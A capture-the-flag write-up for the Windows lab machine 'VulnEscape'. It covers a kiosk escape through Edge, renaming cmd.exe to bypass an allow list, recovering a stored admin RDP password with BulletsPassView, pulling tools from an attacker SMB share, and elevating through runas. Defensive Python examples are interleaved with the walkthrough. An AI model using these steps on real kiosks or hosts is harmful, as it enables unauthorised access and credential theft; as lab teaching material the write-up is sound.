VulnEscape

VulnEscape starts with only one open TCP port, remote desktop. I’ll connect and find a kiosk account that doesn’t require a password. On logging in, I’m presented with a full screen image and not much else. I’ll escape kiosk mode by opening Edge, and using it to access the file system. There I’ll download cmd.exe to the downloads directory, and rename it to msedge.exe to bypass named-based allow lists. With a shell, I’ll find a Remote Desktop Plus session file. I’ll load it into the application, and use BulletPassView to see the password under the obfuscated dots. With an admin password, I’ll use runas to get a shell, but it’s limited by UAC, which I’ll bypass to get full admin access. And for an interesting twist, the entire box is in Korean. In Beyond Root, I’ll set the language back to English and explore the Kiosk mode settings.

Box Info

Name VulnEscape
Play on HackTheBox
Release Date 08 Jul 2025
Retire Date 08 Jul 2025
OS Windows
Base Points Easy [20]
First Blood User N/A (non-competitive)
First Blood Root N/A (non-competitive)
Creator xct

Recon

Initial Scanning

nmap finds a single open TCP port, RDP (3389):

oxdf@hacky$ nmap -p- -vvv --min-rate 10000 10.129.234.51
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-07-06 19:31 UTC
...[snip]...
Nmap scan report for 10.129.234.51
Host is up, received echo-reply ttl 127 (0.15s latency).
Scanned at 2025-07-06 19:31:40 UTC for 14s
Not shown: 65534 filtered tcp ports (no-response)
PORT     STATE SERVICE       REASON
3389/tcp open  ms-wbt-server syn-ack ttl 127

Nmap done: 1 IP address (1 host up) scanned in 15.32 seconds
           Raw packets sent: 131082 (5.768MB) | Rcvd: 9 (380B)
oxdf@hacky$ nmap -p 3389 -sCV 10.129.234.51
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-07-06 19:35 UTC
Nmap scan report for 10.129.234.51
Host is up (0.089s latency).

PORT     STATE SERVICE       VERSION
3389/tcp open  ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info: 
|   Target_Name: ESCAPE
|   NetBIOS_Domain_Name: ESCAPE
|   NetBIOS_Computer_Name: ESCAPE
|   DNS_Domain_Name: Escape
|   DNS_Computer_Name: Escape
|   Product_Version: 10.0.19041
|_  System_Time: 2025-07-06T19:59:33+00:00
| ssl-cert: Subject: commonName=Escape
| Not valid before: 2025-04-10T06:20:36
|_Not valid after:  2025-10-10T06:20:36
|_ssl-date: 2025-07-06T19:59:37+00:00; +23m44s from scanner time.
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 23m43s, deviation: 0s, median: 23m43s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.70 seconds

This is clearly a Windows box, but there’s no evidence of Active Directory at this point.

RDP - TCP 3389

The only open port is remote desktop (RDP), which typically requires credentials. I’ll connect with xfreerdp /v:10.129.234.51 /dynamic-resolution +clipboard -sec-nla, and the resulting window shows a Windows PC in Kiosk mode:

image-20250706160308341

The note says to login as KioskUser0 with no password. I can verify these creds with netexec:

oxdf@hacky$ netexec rdp 10.129.234.51 -u KioskUser0 -p ''
RDP         10.129.234.51   3389   ESCAPE           [*] Windows 10 or Windows Server 2016 Build 19041 (name:ESCAPE) (domain:Escape) (nla:False)
RDP         10.129.234.51   3389   ESCAPE           [+] Escape\KioskUser0: (Pwn3d!)

Clicking the button over RDP opens a login screen, where I’ll use those creds:

image-20250706160501231

It works, and loads an image:

image-20250706160930740

This is likely some kind of Kiosk mode, where this image or website is shown full screen.

Kiosk Escape

Launch Edge

Clicking around doesn’t seem to have any impact on the system. However, when I push the Windows key, it pops the start menu:

image-20250706161504666

If I search for “cmd”, it does load, but clicking it doesn’t do anything:

image-20250706164406181

PowerShell behaves the same way.

I’ll type “edge”, and it brings up Edge:

image-20250706161535084

There are some configuration pages in a language I don’t speak, but after clicking around to get through them, I’ve got a full Edge page:

image-20250706161618069

Access Filesystem

I’ll enter “C:” as the URL, and it loads a file browser:

image-20250706161702354

I’ll find user.txt on the KioskUser0 user’s desktop:

image-20250706161841708

Shell

Download cmd.exe

I’ll head into C:\Windows\System32 and find cmd.exe. Clicking on it, it is downloaded to this user’s Downloads folder:

image-20250706171150989

Clicking the folder icon opens File Explorer:

image-20250706171219186

Run cmd.exe

Double-clicking this pops an error:

image-20250706171259322

If I give that image to an AI (in this case Perplexity), it translates for me:

image-20250706171409146

The restricted files could be identified in many ways. One would be by name. I’ll rename the binary from cmd.exe to 0xdf.exe, but I get the same error:

image-20250706171501949

This suggests that the block is an allow list, rather than a block list. I know that Edge is allowed to run, so I’ll try renaming the binary to msedge.exe, and it opens!

image-20250706171558756

I can run powershell to switch to PowerShell as well:

image-20250706171644949
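The rename trick works because the kiosk policy keys on the file name, which the attacker controls, rather than on something the file carries with it. One defender-side check is to compare the name a process was launched under with the OriginalFileName recorded in its PE version resource, which Sysmon writes into its process-creation (Event ID 1) events and which a rename on disk does not change. The following is an added example, not code from the writeup or from any vendor tool, run over constructed Sysmon-style records (the field layout and the `-` placeholder for a missing field are assumptions); it flags the renamed cmd.exe and also shows the case where no version resource exists and nothing can be compared.

```python
from pathlib import PureWindowsPath

# Constructed Sysmon-style process-creation (Event ID 1) records in a
# "Field: value" layout; not pulled from the box. OriginalFileName is read
# from the PE version resource at execution time, so it survives a rename.
SAMPLE_LOG = r"""
Image: C:\Windows\System32\cmd.exe
OriginalFileName: Cmd.Exe
User: ESCAPE\kioskUser0

Image: C:\Users\kioskUser0\Downloads\msedge.exe
OriginalFileName: Cmd.Exe
User: ESCAPE\kioskUser0

Image: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
OriginalFileName: msedge.exe
User: ESCAPE\kioskUser0

Image: C:\Users\kioskUser0\Downloads\tool.exe
OriginalFileName: -
User: ESCAPE\kioskUser0
"""

# Internal names of shells and script hosts a kiosk allow-list is meant to keep out.
WATCHED_ORIGINALS = {
    "cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe",
    "mshta.exe", "rundll32.exe", "regsvr32.exe",
}


def parse_events(text):
    """Split the rendered log into one dict per blank-line-separated event."""
    events, current = [], {}
    for line in text.splitlines():
        line = line.strip()
        if not line:
            if current:
                events.append(current)
                current = {}
            continue
        key, _, value = line.partition(":")
        current[key.strip()] = value.strip()
    if current:
        events.append(current)
    return events


def classify(event):
    """Compare the on-disk name with the PE-internal name."""
    image_name = PureWindowsPath(event.get("Image", "")).name.lower()
    original = event.get("OriginalFileName", "-").lower()
    if original in ("", "-"):
        return "unknown"        # no version resource: nothing to compare against
    if image_name == original:
        return "match"
    if original in WATCHED_ORIGINALS:
        return "renamed-shell"  # a shell/script host running under a foreign name
    return "renamed"


def detect_renamed(text):
    """Return one finding for every event whose binary runs under a foreign name."""
    findings = []
    for ev in parse_events(text):
        verdict = classify(ev)
        if verdict.startswith("renamed"):
            findings.append({
                "user": ev.get("User", "?"),
                "image": ev["Image"],
                "original": ev["OriginalFileName"],
                "verdict": verdict,
            })
    return findings


if __name__ == "__main__":
    for f in detect_renamed(SAMPLE_LOG):
        print(f"[{f['verdict']}] {f['user']} ran {f['image']} (really {f['original']})")
```

The same comparison is why AppLocker and WDAC rules keyed on publisher or file hash hold up where a path or name rule does not: the signature and hash of the downloaded cmd.exe are unchanged by calling it msedge.exe. The "unknown" verdict is worth keeping in a real pipeline, since an unsigned binary with no version resource is exactly the kind of file a name-only policy cannot reason about.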

Shell as admin

Enumeration

Home Directories

There’s not much interesting in the KioskUser0 user’s home directory:

PS C:\Users\kioskUser0> tree /f .
Folder PATH listing
Volume serial number is 00000040 4A4B:52B4
C:\USERS\KIOSKUSER0
├───3D Objects
├───Contacts
├───Desktop
│       Microsoft Edge.lnk
│       user.txt
│
├───Documents
├───Downloads
│       msedge.exe
│
├───Favorites
├───Links
│       Desktop.lnk
│       Downloads.lnk
│
├───Music
├───Pictures
│   ├───Camera Roll
│   └───Saved Pictures
├───Saved Games
├───Searches
└───Videos

There’s nothing else of interest that’s accessible in C:\Users.

Filesystem Root

At the root of C:, it shows only very standard folders:

PS C:\> ls

    Directory: C:\

Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
d-----          2/3/2024   3:11 AM                inetpub
d-----         12/7/2019   1:14 AM                PerfLogs
d-r---         4/10/2025  11:29 PM                Program Files
d-r---          2/3/2024   3:03 AM                Program Files (x86)
d-r---          2/3/2024   3:43 AM                Users
d-----         6/24/2025   1:24 PM                Windows

However, I recall from browsing with Edge that there were more directories. I’ll look for hidden folders:

PS C:\> ls -force

    Directory: C:\

Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
d--hs-          2/4/2024  12:52 AM                $Recycle.Bin
d--h--         6/24/2025   8:23 AM                $WinREAgent
d--hsl          2/3/2024  11:32 AM                Documents and Settings
d-----          2/3/2024   3:11 AM                inetpub
d-----         12/7/2019   1:14 AM                PerfLogs
d-r---         4/10/2025  11:29 PM                Program Files
d-r---          2/3/2024   3:03 AM                Program Files (x86)
d--h--         6/24/2025   8:06 AM                ProgramData
d--hs-         10/1/2024  11:40 PM                Recovery
d--hs-         6/16/2025   4:42 AM                System Volume Information
d-r---          2/3/2024   3:43 AM                Users
d-----         6/24/2025   1:24 PM                Windows
d--h--          2/3/2024   3:05 AM                _admin
-a-hs-          2/4/2024   1:35 AM           8192 DumpStack.log
-a-hs-          7/6/2025  12:56 PM           8192 DumpStack.log.tmp
-a-hs-         10/1/2024  11:48 PM     2093002752 hiberfil.sys
-a-hs-          7/6/2025  12:56 PM     1476395008 pagefile.sys
-a-hs-          7/6/2025  12:56 PM       16777216 swapfile.sys

Most of this is typical stuff, but _admin is interesting.

PS C:\_admin> ls

    Directory: C:\_admin

Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
d-----          2/3/2024   3:04 AM                installers
d-----          2/3/2024   3:05 AM                passwords
d-----          2/3/2024   3:05 AM                temp
-a----          2/3/2024   3:03 AM              0 Default.rdp
-a----          2/3/2024   3:04 AM            574 profiles.xml

The installers and passwords directories are both empty. profiles.xml has information about a user named admin:

<?xml version="1.0" encoding="utf-16"?>
<!-- Remote Desktop Plus -->
<Data>
  <Profile>
    <ProfileName>admin</ProfileName>
    <UserName>127.0.0.1</UserName>
    <Password>JWqkl6IDfQxXXmiHIKIP8ca0G9XxnWQZgvtPgON2vWc=</Password>
    <Secure>False</Secure>
  </Profile>
</Data>

This file is meant to be used with Remote Desktop Plus.
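A file like this is worth being able to find and triage at scale, since a stored profile with a password value is a credential on disk whatever the application did to the string. As an added example (not code from the writeup or from Remote Desktop Plus), here is a small parser for the profile format shown above: it honours the utf-16 encoding the file declares, pulls out each profile, and reports which ones carry a password and whether that value is base64-shaped. It makes no attempt to reverse the obfuscation; the input is the page's own profiles.xml re-encoded as UTF-16 for the example.

```python
import base64
import binascii
import xml.etree.ElementTree as ET

# The profiles.xml from C:\_admin, re-encoded with a UTF-16 BOM to match its own
# declaration (constructed input for this example).
SAMPLE_PROFILES_XML = """<?xml version="1.0" encoding="utf-16"?>
<!-- Remote Desktop Plus -->
<Data>
  <Profile>
    <ProfileName>admin</ProfileName>
    <UserName>127.0.0.1</UserName>
    <Password>JWqkl6IDfQxXXmiHIKIP8ca0G9XxnWQZgvtPgON2vWc=</Password>
    <Secure>False</Secure>
  </Profile>
</Data>
""".encode("utf-16")


def load_xml_text(data: bytes) -> str:
    """Decode by BOM rather than trusting the XML declaration."""
    if data.startswith((b"\xff\xfe", b"\xfe\xff")):
        return data.decode("utf-16")
    return data.decode("utf-8-sig")


def parse_profiles(data: bytes) -> list:
    """Return one dict per <Profile> element."""
    root = ET.fromstring(load_xml_text(data))
    profiles = []
    for p in root.iter("Profile"):
        profiles.append({
            "name": (p.findtext("ProfileName") or "").strip(),
            "user": (p.findtext("UserName") or "").strip(),
            "password": (p.findtext("Password") or "").strip(),
            # The meaning of <Secure> is the application's; we only report it.
            "secure": (p.findtext("Secure") or "").strip().lower() == "true",
        })
    return profiles


def stored_secret_findings(profiles: list) -> list:
    """Describe every profile that carries a password value."""
    findings = []
    for p in profiles:
        if not p["password"]:
            continue
        try:
            raw = base64.b64decode(p["password"], validate=True)
            shape = f"base64, {len(raw)} bytes decoded"
        except binascii.Error:
            shape = "not base64"
        findings.append(
            f"profile {p['name']!r} for {p['user']!r} stores a password "
            f"({shape}; Secure={p['secure']})"
        )
    return findings


if __name__ == "__main__":
    for line in stored_secret_findings(parse_profiles(SAMPLE_PROFILES_XML)):
        print(line)
```

Decoding by BOM first matters because tools that open this file as UTF-8 see NUL bytes between every character and either fail or miss the tags. The 32-byte decoded length is all the script claims about the password; what the application does with those bytes is for the next section.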

There is an admin user on this machine:

PS C:\> net user

User accounts for \\ESCAPE

-------------------------------------------------------------------------------
admin                    Administrator            DefaultAccount
Guest                    kioskUser0               WDAGUtilityAccount
The command completed successfully.

Remote Desktop Plus

There isn’t too much of interest installed in C:\Program Files or C:\Program Files (x86). The one thing that jumps out is Remote Desktop Plus:

PS C:\Program Files (x86)> ls

    Directory: C:\Program Files (x86)

Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
d-----         12/7/2019   1:31 AM                Common Files
d-----         6/24/2025   1:19 PM                Internet Explorer
d-----          2/3/2024   3:14 AM                Microsoft
d-----         12/7/2019   1:31 AM                Microsoft.NET
d-----          2/3/2024   3:03 AM                Remote Desktop Plus
d-----         6/24/2025  10:10 AM                Windows Defender
d-----          2/3/2024   3:07 AM                Windows Mail
d-----         6/24/2025  10:10 AM                Windows Media Player
d-----         6/24/2025   1:19 PM                Windows Multimedia Platform
d-----         12/7/2019   1:50 AM                Windows NT
d-----         6/24/2025  10:10 AM                Windows Photo Viewer
d-----         6/24/2025   1:19 PM                Windows Portable Devices
d-----         12/7/2019   1:31 AM                WindowsPowerShell

I’ll run it:

PS C:\Program Files (x86)\Remote Desktop Plus> .\rdp.exe

The program opens:

image-20250706173758359

Recover Admin Password

Load Profile

Clicking on “Manage Profiles…” opens a view for profiles:

image-20250706174133803

I’ll try to import a profile:

image-20250706174150933

Unfortunately, the explorer that opens to pick the file won’t go back to the root of C:. From PowerShell, I’ll copy it to the Downloads directory:

PS C:\> copy C:\_admin\profiles.xml C:\Users\kioskUser0\Downloads\

Now I can open it for import:

image-20250706174302897

And it shows up as a profile:

image-20250706174322238

View Obfuscated Password

Unfortunately for me, the password is obfuscated by bullets. Double-clicking to edit the profile shows the same:

image-20250706174732982

If I try to copy the password, it pops another error in Korean:

image-20250706174800369

It is not allowed to copy from the password field:

image-20250706174838122

BulletsPassView

There’s a utility named BulletsPassView from NirSoft that will show what characters are hidden behind bullets on a Windows system.

I’ll download it from the website and unzip the result, giving BulletsPassView.exe. I’ll start an SMB server on my host:

oxdf@hacky$ smbserver.py share $(pwd) -smb2support -username oxdf -password oxdf
/home/oxdf/.local/share/uv/tools/impacket/lib/python3.12/site-packages/impacket/version.py:12: UserWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html. The pkg_resources package is slated for removal as early as 2025-11-30. Refrain from using this package or pin to Setuptools<81.
  import pkg_resources
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed

On VulnEscape, I’ll mount the share, copy the file over, and run it:

PS C:\> net use \\10.10.14.79\share /u:oxdf oxdf
The command completed successfully.

PS C:\> copy \\10.10.14.79\share\BulletsPassView.exe C:\Users\kioskUser0\Downloads\

PS C:\> C:\Users\kioskUser0\Downloads\BulletsPassView.exe

It opens up, detects the running windows, and shows the password:

image-20250706175736394

Low Priv Shell

RDP Fail

I can try to log in with RDP with the new creds, but it doesn’t work:

image-20250707065922766

Perplexity translates that to:

To log in remotely, you must have permission to log in through Remote Desktop Services. By default, members of the Remote Desktop Users group have this permission. If the group you currently belong to does not have this permission, or if this permission has been removed from the Remote Desktop Users group, you must be granted this permission manually.

This is surprising as admin is in the Administrators group:

PS C:\> net user admin
User name                    admin
Full Name
Comment
User's comment
Country/region code          000 (System Default)
Account active               Yes
Account expires              Never

Password last set            2/3/2024 3:45:01 AM
Password expires             Never
Password changeable          2/3/2024 3:45:01 AM
Password required            No
User may change password     Yes

Workstations allowed         All
Logon script
User profile
Home directory
Last logon                   4/10/2025 11:26:42 PM

Logon hours allowed          All

Local Group Memberships      *Administrators
Global Group memberships     *None
The command completed successfully.

VulnEscape must be configured so that membership in the Administrators group alone does not grant the right to log on through Remote Desktop.
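The error text above maps to a single user right, "Allow log on through Remote Desktop Services" (SeRemoteInteractiveLogonRight), which by default Windows grants to both Administrators and Remote Desktop Users, plus its deny counterpart. As an added example (not from the writeup), the following parses the INF that `secedit /export /cfg <file>` writes and answers whether a given set of group SIDs can log on over RDP. The two policy excerpts are constructed, hypothetical values, not a dump from the box: one hardened so that only Remote Desktop Users holds the right, which would produce exactly the symptom seen here for admin, and one with the Windows default for contrast.

```python
# Well-known local group SIDs.
ADMINISTRATORS = "S-1-5-32-544"
USERS = "S-1-5-32-545"
GUESTS = "S-1-5-32-546"
REMOTE_DESKTOP_USERS = "S-1-5-32-555"

# Constructed excerpts in the layout `secedit /export /cfg` produces
# (hypothetical values, not exported from the box).
HARDENED_EXPORT = """[Unicode]
Unicode=yes
[Privilege Rights]
SeRemoteInteractiveLogonRight = *S-1-5-32-555
SeDenyRemoteInteractiveLogonRight = *S-1-5-32-546
SeShutdownPrivilege = *S-1-5-32-544,*S-1-5-32-545
[Version]
signature="$CHICAGO$"
Revision=1
"""

DEFAULT_EXPORT = """[Privilege Rights]
SeRemoteInteractiveLogonRight = *S-1-5-32-544,*S-1-5-32-555
"""


def parse_privilege_rights(text: str) -> dict:
    """Map each right in [Privilege Rights] to the list of SIDs/names holding it."""
    rights, section = {}, None
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith(";"):
            continue
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1]
            continue
        if section != "Privilege Rights" or "=" not in line:
            continue
        name, _, value = line.partition("=")
        # secedit prefixes SIDs with '*'; unresolved names appear bare.
        rights[name.strip()] = [v.strip().lstrip("*") for v in value.split(",") if v.strip()]
    return rights


def rdp_logon_allowed(rights: dict, member_sids) -> bool:
    """Deny rights win over allow rights, as in Windows logon-right evaluation."""
    allowed = set(rights.get("SeRemoteInteractiveLogonRight", []))
    denied = set(rights.get("SeDenyRemoteInteractiveLogonRight", []))
    sids = set(member_sids)
    if sids & denied:
        return False
    return bool(sids & allowed)


def explain(rights: dict, who: str, member_sids) -> str:
    """One-line verdict for a report."""
    verdict = "can" if rdp_logon_allowed(rights, member_sids) else "cannot"
    return f"{who} {verdict} log on through Remote Desktop Services"


if __name__ == "__main__":
    hardened = parse_privilege_rights(HARDENED_EXPORT)
    default = parse_privilege_rights(DEFAULT_EXPORT)
    # admin on this box: Administrators member, and nothing else relevant.
    print("hardened:", explain(hardened, "admin", {ADMINISTRATORS, USERS}))
    print("default: ", explain(default, "admin", {ADMINISTRATORS, USERS}))
```

On a live host the export needs an elevated prompt (`secedit /export /cfg C:\Users\Public\rights.inf`) and is written as UTF-16, so decode it before feeding it to the parser; `whoami /groups` gives the SIDs to pass in, since `net user` only shows group names. The same two keys are what the Local Security Policy GUI edits under User Rights Assignment.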

Runas

Regardless, I can still use runas to run a new command as admin:

PS C:\> runas /user:admin powershell
Enter the password for admin:
Attempting to start powershell as user "ESCAPE\admin" ...

A new window opens:

image-20250706180738582

This shell is missing the full Administrator privileges:

PS C:\Windows\system32> whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                          State
============================= ==================================== ========
SeShutdownPrivilege           Shut down the system                 Disabled
SeChangeNotifyPrivilege       Bypass traverse checking             Enabled
SeUndockPrivilege             Remove computer from docking station Disabled
SeIncreaseWorkingSetPrivilege Increase a process working set       Disabled
SeTimeZonePrivilege           Change the time zone                 Disabled

It must be UAC that’s blocking.

UAC Bypass

With GUI access, the quickest way past UAC is to run start-process powershell.exe -verb runas in the admin shell, which pops the interactive UAC consent dialog:

image-20250706181001985

Perplexity AI translates:

image-20250706181040709

I’ll click yes and a blue PowerShell window opens:

image-20250706181123245

This shell has full privs:

PS C:\> whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                            Description                                                        State
========================================= ================================================================== ========
SeIncreaseQuotaPrivilege                  Adjust memory quotas for a process                                 Disabled
SeSecurityPrivilege                       Manage auditing and security log                                   Disabled
SeTakeOwnershipPrivilege                  Take ownership of files or other objects                           Disabled
SeLoadDriverPrivilege                     Load and unload device drivers                                     Disabled
SeSystemProfilePrivilege                  Profile system performance                                         Disabled
SeSystemtimePrivilege                     Change the system time                                             Disabled
SeProfileSingleProcessPrivilege           Profile single process                                             Disabled
SeIncreaseBasePriorityPrivilege           Increase scheduling priority                                       Disabled
SeCreatePagefilePrivilege                 Create a pagefile                                                  Disabled
SeBackupPrivilege                         Back up files and directories                                      Disabled
SeRestorePrivilege                        Restore files and directories                                      Disabled
SeShutdownPrivilege                       Shut down the system                                               Disabled
SeDebugPrivilege                          Debug programs                                                     Enabled
SeSystemEnvironmentPrivilege              Modify firmware environment values                                 Disabled
SeChangeNotifyPrivilege                   Bypass traverse checking                                           Enabled
SeRemoteShutdownPrivilege                 Force shutdown from a remote system                                Disabled
SeUndockPrivilege                         Remove computer from docking station                               Disabled
SeManageVolumePrivilege                   Perform volume maintenance tasks                                   Disabled
SeImpersonatePrivilege                    Impersonate a client after authentication                          Enabled
SeCreateGlobalPrivilege                   Create global objects                                              Enabled
SeIncreaseWorkingSetPrivilege             Increase a process working set                                     Disabled
SeTimeZonePrivilege                       Change the time zone                                               Disabled
SeCreateSymbolicLinkPrivilege             Create symbolic links                                              Disabled
SeDelegateSessionUserImpersonatePrivilege Obtain an impersonation token for another user in the same session Disabled

The flag is on the Administrator user’s desktop:

PS C:\Users\Administrator\Desktop> type root.txt
d46ea343************************

Beyond Root

Language Settings

As KioskUser0, in addition to Edge, I’m also able to open the Settings Window:

image-20250707160017084

If I search for “language”, there are several options:

image-20250707160107843

The top option loads the language settings:

image-20250707160135761

Setting it to English pops an error saying I must log out and back on again:

image-20250707160157634

In a terminal, I’ll run logoff, and then reconnect with RDP. There is still some Korean, but a lot of stuff is in English now. For example, the settings application in the start menu:

image-20250707160507968

And the settings:

image-20250707160528549

Kiosk Mode

In settings, I’ll search for Kiosk, but there’s nothing there:

image-20250707160612106

This is because KioskUser0 has no permissions to access this setting. From my privileged shell, I’ll add the KioskUser0 user to the Administrators group:

PS C:\> net localgroup administrators /add KioskUser0
The command completed successfully.

I’ll run logoff again, and reconnect RDP. Back in Settings, now there’s a Kiosk panel:

image-20250707160942635

It is set up to run Edge as the Kiosk user:

image-20250707161049809

The user shows Kiosk because that is the user’s full name:

C:\Users\kioskUser0\Downloads>net user kioskuser0
User name                    kioskUser0
Full Name                    Kiosk
Comment
User's comment
Country/region code          000 (System Default)
Account active               Yes
Account expires              Never

Password last set            7/7/2025 1:41:28 PM
Password expires             Never
Password changeable          7/7/2025 1:41:28 PM
Password required            No
User may change password     Yes

Workstations allowed         All
Logon script
User profile
Home directory
Last logon                   7/7/2025 1:24:37 PM

Logon hours allowed          All

Local Group Memberships      *Administrators       *Remote Desktop Users
                             *Users
Global Group memberships     *None
The command completed successfully.

It loads the website on localhost as a full screen application. This is what restricts this user to running only msedge.exe.